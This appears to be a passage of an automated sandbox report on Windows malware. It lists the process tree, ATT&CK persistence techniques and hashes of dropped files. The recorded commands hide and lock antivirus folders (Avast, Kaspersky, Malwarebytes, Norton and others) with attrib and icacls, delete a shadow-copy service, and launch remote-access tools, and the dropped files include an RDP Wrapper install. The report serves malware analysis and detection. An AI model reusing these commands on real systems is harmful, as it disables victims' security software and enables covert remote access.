C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVAST Software\Avast"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\AVAST Software"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\AdwCleaner"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\programdata\Malwarebytes"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\MB3Install"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\KVRT_Data"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Norton"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Avg"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\grizzly"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Doctor Web"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Indus"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\WINDOWS\McMwt"5⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Intel"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Check"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Temp"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
3Hidden Files and Directories
3Account Manipulation
1Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\System\iediagcmd.exe
-
C:\Program Files\Common Files\System\iexplore.exe
-
C:\Program Files\RDP Wrapper\rdpwrap.dll
-
C:\Program Files\RDP Wrapper\rdpwrap.ini
-
C:\ProgramData\Microsoft\Intel\BLOCK.bat
-
C:\ProgramData\Microsoft\Intel\R8.exeMD5
ad95d98c04a3c080df33ed75ad38870f
SHA1abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA25640d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed
-
C:\ProgramData\Microsoft\Intel\taskhost.exeMD5
5cf0195be91962de6f58481e15215ddd
SHA17b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6
SHA2560b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d
SHA5120df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4
-
C:\ProgramData\Microsoft\Intel\taskhost.exeMD5
5cf0195be91962de6f58481e15215ddd
SHA17b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6
SHA2560b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d
SHA5120df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4
-
C:\ProgramData\Microsoft\Intel\wini.exeMD5
098d7cf555f2bafd4535c8c245cf5e10
SHA1b45daf862b6cbb539988476a0b927a6b8bb55355
SHA25601e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a
SHA512e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624
-
C:\ProgramData\Microsoft\Intel\wini.exeMD5
098d7cf555f2bafd4535c8c245cf5e10
SHA1b45daf862b6cbb539988476a0b927a6b8bb55355
SHA25601e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a
SHA512e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624
-
C:\ProgramData\RealtekHD\taskhostw.exeMD5
73ca737af2c7168e9c926a27abf7a5b1
SHA105fd828fd58a64f25682845585f6565b7ca2fdb2
SHA25699dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2
SHA512de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172
-
C:\ProgramData\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
C:\ProgramData\Windows\install.vbsMD5
5e36713ab310d29f2bdd1c93f2f0cad2
SHA17e768cca6bce132e4e9132e8a00a1786e6351178
SHA256cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA5128e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1
-
C:\ProgramData\Windows\reg1.regMD5
0bfedf7b7c27597ca9d98914f44ccffe
SHA1e4243e470e96ac4f1e22bf6dcf556605c88faaa9
SHA2567e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e
SHA512d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d
-
C:\ProgramData\Windows\reg2.regMD5
6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1235a78495192fc33f13af3710d0fe44e86a771c9
SHA2564ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\vp8decoder.dllMD5
88318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
C:\ProgramData\Windows\vp8encoder.dllMD5
6298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
C:\ProgramData\Windows\winit.exeMD5
aaf3eca1650e5723d5f5fb98c76bebce
SHA12fa0550949a5d775890b7728e61a35d55adb19dd
SHA256946b1c407144816c750e90cdf1bf253a4718e18b180a710b0408b4944e8f7d4f
SHA5121cb6c141fc80a0c1015050e83c6e9e5787d2ac0240065cc656c3f2a7bacaa27c89347b7d03f227525f3895990bd6b14abcb3a5a95fcf20cd901a5da96965dd6b
-
C:\ProgramData\Windows\winit.exeMD5
aaf3eca1650e5723d5f5fb98c76bebce
SHA12fa0550949a5d775890b7728e61a35d55adb19dd
SHA256946b1c407144816c750e90cdf1bf253a4718e18b180a710b0408b4944e8f7d4f
SHA5121cb6c141fc80a0c1015050e83c6e9e5787d2ac0240065cc656c3f2a7bacaa27c89347b7d03f227525f3895990bd6b14abcb3a5a95fcf20cd901a5da96965dd6b
-
C:\ProgramData\install\cheat.exeMD5
0d18b4773db9f11a65f0b60c6cfa37b7
SHA14d4c1fe9bf8da8fe5075892d24664e70baf7196e
SHA256e3d02b5bfcab47b86a2366ef37c3c872858b2e25ad5c5a4d1a5e49c2afaee673
SHA512a607cf5d9dd1c7d8571a9e53fb65255b7c698c08e4f1115650ee08c476a0a7b75627a5b8cd93d8839a750def62dee465e6b947ecf4b875eda5d5e0cb9141a02c
-
C:\ProgramData\install\sys.exeMD5
bfa81a720e99d6238bc6327ab68956d9
SHA1c7039fadffccb79534a1bf547a73500298a36fa0
SHA256222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f
SHA5125ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab
-
C:\ProgramData\install\sys.exeMD5
bfa81a720e99d6238bc6327ab68956d9
SHA1c7039fadffccb79534a1bf547a73500298a36fa0
SHA256222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f
SHA5125ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab
-
C:\Programdata\Install\del.batMD5
398a9ce9f398761d4fe45928111a9e18
SHA1caa84e9626433fec567089a17f9bcca9f8380e62
SHA256e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1
SHA51245255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b
-
C:\Programdata\RealtekHD\taskhostw.exeMD5
73ca737af2c7168e9c926a27abf7a5b1
SHA105fd828fd58a64f25682845585f6565b7ca2fdb2
SHA25699dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2
SHA512de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172
-
C:\Programdata\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
C:\Programdata\Windows\install.batMD5
db76c882184e8d2bac56865c8e88f8fd
SHA1fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92
-
C:\Programdata\kz.exe
-
C:\Programdata\lsass.exe
-
C:\Programdata\lsass2.exe
-
C:\Programdata\olly.exe
-
C:\Programdata\script.exe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
c849f974ca089650e9e1eda85a0aeebf
SHA160e5d05ef340ca23aca2758b1b1abb59a8847e69
SHA25685a0e174146311e80d0687f629ac1f19fa6696cb19c98ae76bd9626c363206c8
SHA512c7b818f7fa3f2faa3db6d8dbe8d04e88347fd480324e1045655da061cd2921e8eabd89bf201fd03f087ffda5343466772a4f152f5dfbe1a3c62709800e49d836
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
-
C:\Windows\SysWOW64\drivers\conhost.exeMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Windows\boy.exe
-
C:\Windows\java.exe
-
C:\programdata\install\cheat.exeMD5
0d18b4773db9f11a65f0b60c6cfa37b7
SHA14d4c1fe9bf8da8fe5075892d24664e70baf7196e
SHA256e3d02b5bfcab47b86a2366ef37c3c872858b2e25ad5c5a4d1a5e49c2afaee673
SHA512a607cf5d9dd1c7d8571a9e53fb65255b7c698c08e4f1115650ee08c476a0a7b75627a5b8cd93d8839a750def62dee465e6b947ecf4b875eda5d5e0cb9141a02c
-
C:\programdata\microsoft\intel\R8.exeMD5
ad95d98c04a3c080df33ed75ad38870f
SHA1abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA25640d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed
-
C:\programdata\microsoft\temp\H.bat
-
C:\programdata\microsoft\temp\Temp.bat
-
C:\rdp\RDPWInst.exe
-
C:\rdp\RDPWInst.exe
-
C:\rdp\RDPWInst.exe
-
C:\rdp\Rar.exeMD5
2e86a9862257a0cf723ceef3868a1a12
SHA1a4324281823f0800132bf13f5ad3860e6b5532c6
SHA2562356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA5123a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de
-
C:\rdp\Rar.exeMD5
2e86a9862257a0cf723ceef3868a1a12
SHA1a4324281823f0800132bf13f5ad3860e6b5532c6
SHA2562356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA5123a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de
-
C:\rdp\bat.bat
-
C:\rdp\db.rar
-
C:\rdp\install.vbs
-
C:\rdp\pause.batMD5
a47b870196f7f1864ef7aa5779c54042
SHA1dcb71b3e543cbd130a9ec47d4f847899d929b3d2
SHA25646565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba
SHA512b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60
-
C:\rdp\run.vbsMD5
6a5f5a48072a1adae96d2bd88848dcff
SHA1b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c
-
\??\PIPE\lsarpc
-
\??\PIPE\samr
-
\??\PIPE\samr
-
\??\PIPE\samr
-
\??\PIPE\samr
-
\??\PIPE\samr
-
\??\c:\windows\svchost.exe
-
\Program Files\RDP Wrapper\rdpwrap.dll
-
\ProgramData\Microsoft\Intel\R8.exeMD5
ad95d98c04a3c080df33ed75ad38870f
SHA1abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA25640d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed
-
\ProgramData\Microsoft\Intel\taskhost.exeMD5
5cf0195be91962de6f58481e15215ddd
SHA17b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6
SHA2560b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d
SHA5120df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4
-
\ProgramData\Microsoft\Intel\taskhost.exeMD5
5cf0195be91962de6f58481e15215ddd
SHA17b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6
SHA2560b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d
SHA5120df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4
-
\ProgramData\Microsoft\Intel\taskhost.exeMD5
5cf0195be91962de6f58481e15215ddd
SHA17b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6
SHA2560b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d
SHA5120df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4
-
\ProgramData\Microsoft\Intel\taskhost.exeMD5
5cf0195be91962de6f58481e15215ddd
SHA17b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6
SHA2560b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d
SHA5120df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4
-
\ProgramData\Microsoft\Intel\wini.exeMD5
098d7cf555f2bafd4535c8c245cf5e10
SHA1b45daf862b6cbb539988476a0b927a6b8bb55355
SHA25601e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a
SHA512e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624
-
\ProgramData\RealtekHD\taskhostw.exeMD5
73ca737af2c7168e9c926a27abf7a5b1
SHA105fd828fd58a64f25682845585f6565b7ca2fdb2
SHA25699dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2
SHA512de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172
-
\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
